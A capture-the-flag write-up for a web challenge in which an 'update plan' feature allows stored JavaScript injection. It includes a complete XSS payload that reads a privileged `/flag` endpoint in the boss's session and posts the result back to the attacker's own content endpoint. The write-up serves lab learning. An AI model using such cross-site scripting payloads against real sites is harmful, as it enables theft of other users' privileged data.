- After entering the target there is a login page; any credentials let you in.
  Even with the same username and password, the endpoint you get after logging in is different every time.
- Directory scanning reveals a `/flag` endpoint, but its content can only be read with the boss identity.
- The page shown after login has an "update plan" feature that lets us insert JS code into the current page.
- When the page is submitted to the boss, the boss views our content.
Approach:
Insert JS code that automatically reads the content of the `/flag` endpoint and then submits what it read through our own "update plan" feature; then submit that page to the boss.
Payload:

```html
<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><title>Content Display</title></head>
<body>
<div id="flag-content">Loading...</div>
<div id="response"></div>
<script>
// Read /flag with the viewer's (boss's) session, then post the result back to our own plan endpoint
fetch('/flag')
  .then(response => {
    if (!response.ok) { throw new Error('Network response was not ok'); }
    return response.text(); // get the response body as text
  })
  .then(data => {
    document.getElementById('flag-content').innerText = data;
    // submit the flag text via our own update-plan endpoint so it appears in our content
    return fetch('/content/917420be0d2e454937b1001cfad79b29', {
      method: 'POST',
      headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
      body: new URLSearchParams({ content: data })
    });
  })
  .then(response => {
    if (!response.ok) { throw new Error('Network response was not ok for POST'); }
    return response.text();
  })
  .then(postResponse => {
    document.getElementById('response').innerText = postResponse;
    console.log('POST response:', postResponse);
  })
  .catch(error => {
    console.error('Error:', error);
    document.getElementById('flag-content').innerText = 'Error loading content';
  });
</script>
</body>
</html>
```
- The `/content/917420be0d2e454937b1001cfad79b29` path must match the one you obtained yourself (it differs on every login).
- Insert the JS code into the request packet.